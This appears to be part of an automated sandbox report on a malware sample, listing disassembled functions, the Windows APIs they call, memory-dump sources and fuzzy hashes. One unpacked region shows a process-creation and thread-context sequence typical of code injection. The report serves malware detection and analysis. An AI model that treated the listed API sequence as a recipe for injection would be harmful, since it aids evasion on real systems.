Opcode Fuzzy Hash: ed1829bc00798a8ecbda3036d878ed25fc3d76af8036f999efcb163d05edc541
Instruction Fuzzy Hash: 3E11577161020ABFDB209F68DC80EEEBBB9EF04740F128469F805D7210E2719F40ABB0

Function 010812A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01081A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01081AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01081B13

Memory Dump Source

Source File: 00000000.00000002.2174293223.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1080000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction ID: 69a28aaa74916c6ee0c4563b4c07bb272c732175be1359992b547a9e0227d8c2
Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction Fuzzy Hash: 7E620930A18658DBEB24DFA4C850BDEB772FF58300F1091A9D24DEB290E7759E81CB59

Function 00DA97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00D45045: _fseek.LIBCMT ref: 00D4505D

Part of subcall function 00DA99BE: _wcscmp.LIBCMT ref: 00DA9AAE
Part of subcall function 00DA99BE: _wcscmp.LIBCMT ref: 00DA9AC1

_free.LIBCMT ref: 00DA992C
_free.LIBCMT ref: 00DA9933
_free.LIBCMT ref: 00DA999E

Part of subcall function 00D62F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00D69C64), ref: 00D62FA9
Part of subcall function 00D62F95: GetLastError.KERNEL32(00000000,?,00D69C64), ref: 00D62FBB

_free.LIBCMT ref: 00DA99A6

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction ID: 86a681881814a2793df19276613637b71f1cb9be3e0e1356f737e327a8568da5
Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction Fuzzy Hash: 765150B1D04618AFDF249F64DC41A9EBBB9EF49310F1404AEB649A7241DB715E80CF78

Function 00D6493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D649D0
__flush.LIBCMT ref: 00D649F0
__write.LIBCMT ref: 00D64A23
__flsbuf.LIBCMT ref: 00D64A51

Part of subcall function 00D68D68: __getptd_noexit.LIBCMT ref: 00D68D68

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: e7fba1219b9dcfcab54dedfde92d23b9d6f25fce480e6ac42d0f14e9c18dfab2
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 4341D675680705AFDF28DFA9C8809AF7BA6EF80364B28813EE855C7640D770DD408B74

Function 00D473E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D7EE62
GetOpenFileNameW.COMDLG32(?), ref: 00D7EEAC

Part of subcall function 00D448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D448A1,?,?,00D437C0,?), ref: 00D448CE

Part of subcall function 00D609D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D609F4

Strings

X, xrefs: 00D7EE7A

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 331de82ad902ea13d5aecbd8e374a05896d22b53af0f379fd15890c632d8c8ca
Instruction ID: 931d1cc4e98cbf5e9ba563af2aeeec4522d903e4422fa3721fcdfb3b9090ff07
Opcode Fuzzy Hash: 331de82ad902ea13d5aecbd8e374a05896d22b53af0f379fd15890c632d8c8ca
Instruction Fuzzy Hash: 5A21A130A102589BCB01DF94C845BEEBBF9EF49300F04805AE508E7281DBB459898FB1

Function 00DA901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DA9036
__fread_nolock.LIBCMT ref: 00DA904B

Strings

EA06, xrefs: 00DA907D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 701719f98e2964014659de5dc2d81c1515107374b99d99479c433bed861bd93a
Instruction ID: f85758eecd835d4a7bffc81ac44304b05ec3140608be698715c87998313cffe7
Opcode Fuzzy Hash: 701719f98e2964014659de5dc2d81c1515107374b99d99479c433bed861bd93a
Instruction Fuzzy Hash: 1C01F9718042186FDB28C7A8DC56EFEBBF8DB01301F00419AF552D2181E575E6088770

Function 00DA9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00DA9B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DA9B99

Strings

aut, xrefs: 00DA9B93

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 1a7d0e7bb262ff63c0d2b5924fc807e964468d852f2097a16cb7f8f7b0bb00bb
Instruction ID: 53d2a2a8f6c850cadfb6dfd24f7f88a5d4572437b4d18f5d440cbcc500e21304
Opcode Fuzzy Hash: 1a7d0e7bb262ff63c0d2b5924fc807e964468d852f2097a16cb7f8f7b0bb00bb
Instruction Fuzzy Hash: FED05E7A54030FABDB109B94DC0EFEABB2CE704704F0042A1BF58D21A1DEB055988BA5

Function 00DBCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9b9bca6fc256706a845b3ddcfd924c50d2f0297d36c6ed951bc82343120e32c
Instruction ID: f16cda65928a0a0077f4d07b548f0773a2c3a4dd4dc1ecd637225ed84e96f2a3
Opcode Fuzzy Hash: d9b9bca6fc256706a845b3ddcfd924c50d2f0297d36c6ed951bc82343120e32c
Instruction Fuzzy Hash: 36F11570608341DFC714DF29C485A6ABBE6FF88314F14892EF89A9B251D731E945CFA2

Function 00D443DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D44401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D444A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D444C3

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: babeceb3efab4bff7e800c335b2fe1ca67223385bb22c58dceb1f9c1d21a877e
Instruction ID: d912acaf55d0ffc924e8773af23d0c349c3c4f3aafb9e96b621a76804ef1a93b
Opcode Fuzzy Hash: babeceb3efab4bff7e800c335b2fe1ca67223385bb22c58dceb1f9c1d21a877e
Instruction Fuzzy Hash: 62316FB05057018FD720DF65D884B9BBBF8FB49314F04092EF59E93251E7B5A988CBA2

Function 00D6594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00D65963

Part of subcall function 00D6A3AB: __NMSG_WRITE.LIBCMT ref: 00D6A3D2
Part of subcall function 00D6A3AB: __NMSG_WRITE.LIBCMT ref: 00D6A3DC

__NMSG_WRITE.LIBCMT ref: 00D6596A

Part of subcall function 00D6A408: GetModuleFileNameW.KERNEL32(00000000,00E043BA,00000104,?,00000001,00000000), ref: 00D6A49A
Part of subcall function 00D6A408: ___crtMessageBoxW.LIBCMT ref: 00D6A548

Part of subcall function 00D632DF: ___crtCorExitProcess.LIBCMT ref: 00D632E5
Part of subcall function 00D632DF: ExitProcess.KERNEL32 ref: 00D632EE

Part of subcall function 00D68D68: __getptd_noexit.LIBCMT ref: 00D68D68

RtlAllocateHeap.NTDLL(01140000,00000000,00000001,00000000,?,?,?,00D61013,?), ref: 00D6598F

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 3997509c1070b1dbe5d4cd2ff17e6a2e137d5dc7684a3879af15f8ae91f76812
Instruction ID: 3025bb2ea43a1e922146659b26ffce2d10b8d4a88b5e6764e4ccee1e85b4328a
Opcode Fuzzy Hash: 3997509c1070b1dbe5d4cd2ff17e6a2e137d5dc7684a3879af15f8ae91f76812
Instruction Fuzzy Hash: 0201DE71381B16DFE6217B69FC42A6E7298CF42730F14012BF642AB2D2DE719D818E70

Function 00DA9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00DA97D2,?,?,?,?,?,00000004), ref: 00DA9B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DA97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00DA9B5B
CloseHandle.KERNEL32(00000000,?,00DA97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00DA9B62

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 074d2d8c42667c56f5d207dd1473d1c3c36e744ee1a33b6165c261ccd30e8d05
Instruction ID: 19c120bdf638cb3c08664f37e3d5e1099114b640ba44a5dba55281c7d849db12
Opcode Fuzzy Hash: 074d2d8c42667c56f5d207dd1473d1c3c36e744ee1a33b6165c261ccd30e8d05
Instruction Fuzzy Hash: 8EE08632580316B7D7211B54EC09FCA7B19AB05761F144120FB14A91E087B1251197A8

Function 00D4AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00D8002B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 79429be7d7ed095463b525338e80bdef112f48b5635ee323395ec5255afdfb4e
Instruction ID: d450198015c07545cef1a864dcaa234cf95129cda1c49c1a58fdd62295d0e4c5
Opcode Fuzzy Hash: 79429be7d7ed095463b525338e80bdef112f48b5635ee323395ec5255afdfb4e
Instruction Fuzzy Hash: 2F223874608341DFCB24DF18C494A2ABBE1FF45310F19895DE89A9B362D731EC85CBA2

Function 00D44DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D44E1A

Strings

EA06, xrefs: 00D7DCF5

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 1ed7a722600b7602730a336c914550e5bea0da88e1b091bd266b8fa18274d5dc
Instruction ID: 65ecf46376e3d253d35f7964c1868890a5248e01b5aab8708283ce5d7e9995dd
Opcode Fuzzy Hash: 1ed7a722600b7602730a336c914550e5bea0da88e1b091bd266b8fa18274d5dc
Instruction Fuzzy Hash: 04415961A042586BDF219F64D8917BE7FA6EF05300F6C4075F8C2AB286D621DDC487B1

Function 00D4492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00D44992

Part of subcall function 00D635AC: __lock.LIBCMT ref: 00D635B2
Part of subcall function 00D635AC: DecodePointer.KERNEL32(00000001,?,00D449A7,00D981BC), ref: 00D635BE
Part of subcall function 00D635AC: EncodePointer.KERNEL32(?,?,00D449A7,00D981BC), ref: 00D635C9

Part of subcall function 00D44A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D44A73
Part of subcall function 00D44A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D44A88

Part of subcall function 00D43B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D43B7A
Part of subcall function 00D43B4C: IsDebuggerPresent.KERNEL32 ref: 00D43B8C
Part of subcall function 00D43B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E062F8,00E062E0,?,?), ref: 00D43BFD
Part of subcall function 00D43B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00D43C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D449D2

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 3ff781235ce1a2eb60b11c170cdd280dbfa9db297d3d278e84087d147527901e
Instruction ID: 70f1a887c49cb4f7a9ae7c1411a2c94fb0acf4293a90dfb27bc49830b48be148
Opcode Fuzzy Hash: 3ff781235ce1a2eb60b11c170cdd280dbfa9db297d3d278e84087d147527901e
Instruction Fuzzy Hash: FA118C719083119FC700DF2ADC46A0AFBE8EF94710F00451EF095A72B1DB719599CBB2

Function 00D60FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D6594C: __FF_MSGBANNER.LIBCMT ref: 00D65963
Part of subcall function 00D6594C: __NMSG_WRITE.LIBCMT ref: 00D6596A
Part of subcall function 00D6594C: RtlAllocateHeap.NTDLL(01140000,00000000,00000001,00000000,?,?,?,00D61013,?), ref: 00D6598F

std::exception::exception.LIBCMT ref: 00D6102C
__CxxThrowException@8.LIBCMT ref: 00D61041

Part of subcall function 00D687DB: RaiseException.KERNEL32(?,?,?,00DFBAF8,00000000,?,?,?,?,00D61046,?,00DFBAF8,?,00000001), ref: 00D68830

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: d740aaf3b9d43be8093d244c91ae97f79c746c5db2eb73d8451ed79e81d60cf2
Instruction ID: 337185d346f3105de6de6c00ec97cdf60a45e993e0dd18e5f11f99c60cbc3cf8
Opcode Fuzzy Hash: d740aaf3b9d43be8093d244c91ae97f79c746c5db2eb73d8451ed79e81d60cf2
Instruction Fuzzy Hash: 99F0C83954035DA7CF20BB98EC06AEF7BACDF10351F144566F80496691EFB19A8496F0

Function 00D6582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D6585C
__lock_file.LIBCMT ref: 00D6587D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: fcf9f4a4f64686039d30fb46155535ec20e8a7e3b77be8d3f9aa43ab44c59887
Instruction ID: 7c1f0b4d2001c48e449ac7b2c69f063db8f3ed613f0b8cf0ba97c84ceb203dd1
Opcode Fuzzy Hash: fcf9f4a4f64686039d30fb46155535ec20e8a7e3b77be8d3f9aa43ab44c59887
Instruction Fuzzy Hash: 56014471800609EBCF12AF69DC0559F7B61EF81360F188215B8145B1A5DB31CAA1EFB1

Function 00D655D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D68D68: __getptd_noexit.LIBCMT ref: 00D68D68

__lock_file.LIBCMT ref: 00D6561B

Part of subcall function 00D66E4E: __lock.LIBCMT ref: 00D66E71

__fclose_nolock.LIBCMT ref: 00D65626

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: e038ae42b77d9b415ac39e914bc2597c03bc5fc8264872de95c027ea3da8ac97
Instruction ID: bf8e7a3e195c05ba59ed3fdc2e6ad0ce06b76f3a889a0c28bb422ddfe2dd6e25
Opcode Fuzzy Hash: e038ae42b77d9b415ac39e914bc2597c03bc5fc8264872de95c027ea3da8ac97
Instruction Fuzzy Hash: 95F0B471800A059BD720AFB9D80276E77A1AF41334F558309F455AB1C5CF7C8981EF75

Function 0108129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01081A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01081AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01081B13

Memory Dump Source

Source File: 00000000.00000002.2174293223.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1080000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction ID: d484c3aa9febc76a34208c9a2a78e1b7c694bc83f7030d1f0f63073b699164dc
Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction Fuzzy Hash: B212EE24E18658C6EB24DF64D8507DEB272FF68300F1090E9D14DEB7A4E77A4E81CB5A

Function 00D800D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00D800E1

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
